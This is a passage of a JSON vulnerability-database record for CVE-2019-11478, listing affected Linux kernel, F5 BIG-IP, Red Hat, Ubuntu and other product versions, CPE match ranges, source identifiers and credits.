        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.6"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip aam hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.2"
      },
      {
        "model": "big-ip aam hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.58"
      },
      {
        "model": "network security manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "9.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.15"
      },
      {
        "model": "big-ip gtm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.5"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.2"
      },
      {
        "model": "big-ip afm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15.10"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.8"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "virtualization extended update support for rhel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-4.27.6"
      },
      {
        "model": "big-ip apm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.4"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.8"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.14"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.3"
      },
      {
        "model": "openshift on azure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.79"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.12"
      },
      {
        "model": "big-ip asm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.4"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.45"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.18.1"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.98"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.8"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.4"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1627"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.10"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "19.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.12"
      },
      {
        "model": "siem enterprise security manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "11.0"
      },
      {
        "model": "big-ip ltm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#905115"
      },
      {
        "db": "BID",
        "id": "108798"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-005618"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11478"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.182",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.182",
                "versionStartIncluding": "4.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.127",
                "versionStartIncluding": "4.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.52",
                "versionStartIncluding": "4.15",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.1.11",
                "versionStartIncluding": "4.20",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_fraud_protection_service:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "12.1.4",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "14.1.0",
                "versionStartIncluding": "14.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.4",
                "versionStartIncluding": "11.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "13.1.1",
                "versionStartIncluding": "13.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_domain_name_system:15.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_aus:6.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_aus:6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:7.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:redhat:enterprise_linux_atomic_host:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_mrg:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:pulsesecure:pulse_policy_secure:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:pulsesecure:pulse_secure_virtual_application_delivery_controller:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ivanti:connect_secure:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:traffix_signaling_delivery_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.1.0",
                "versionStartIncluding": "5.0.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-11478"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "153316"
      },
      {
        "db": "PACKETSTORM",
        "id": "153319"
      },
      {
        "db": "PACKETSTORM",
        "id": "153317"
      },
      {
        "db": "PACKETSTORM",
        "id": "153322"
      },
      {
        "db": "PACKETSTORM",
        "id": "153324"
      },
      {
        "db": "PACKETSTORM",
        "id": "153321"
      },
      {
        "db": "PACKETSTORM",
        "id": "153325"
      },
      {
        "db": "PACKETSTORM",
